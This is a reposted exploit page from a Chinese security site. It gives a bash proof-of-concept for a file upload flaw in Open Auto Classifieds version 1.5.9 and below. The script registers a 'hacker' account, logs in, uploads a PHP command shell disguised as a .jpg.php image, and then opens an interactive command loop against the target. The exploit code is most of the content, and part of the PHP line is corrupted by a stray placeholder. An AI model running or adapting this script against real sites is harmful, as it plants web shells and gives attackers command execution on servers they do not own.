首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Open Auto Classifieds versions 1.5.9 and below remote file upload exploit
来源:http://packetstormsecurity.org/0908-exploits/MORNI 作者:MORNINGSTAR 发布时间:2009-08-28  
#!/bin/bash
# File Upload exploit for Open Auto Classifieds version <= 1.5.9
# 
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009  http://www.morningstarsecurity.com/

if [ -z "$1" ]; then
	echo  "Usage: $0 <target-url>"
	echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"
	echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."
    echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
    exit
fi
target="$1"
	
echo "<? print passthru(\
___FCKpd___0
REQUEST['cmd']); ?>" > evilimage.jpg.php echo "Registering user" curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1 echo "Login" curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1 echo "Upload command shell as user image" curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F "max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1 CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null | grep _thumb.jpg | egrep -o "[0-9]{4}"` rm -f cookiejar evilimage.jpg.php echo "Command shell found at : $target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" curl "$target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" 2>/dev/null while read cmd; do curl -d "cmd=$cmd" "$target/images/users/hacker${CODE}evilimage.jpg.php" 2>/dev/null done

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Open Auto Classifieds <= 1.5.9
·Discuz! Plugin Crazy Star <= 2
·PIPL <= 2.5.0 (.m3u File) Univ
·TFTPUtil GUI 1.3.0 Remote Deni
·uTorrent <= 1.8.3 (Build 15772
·linux/x86 Polymorphic shellcod
·HTML Creator & Sender <= 2.3 b
·Linux Kernel <= 2.6.30 atalk_g
·MediaCoder version 0.7.x .m3u/
·EesySec Personal Firewall Remo
·URL Hunter version 3.0.12 loca
·WM Downloader (.Smi/ .Ram/ .pl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved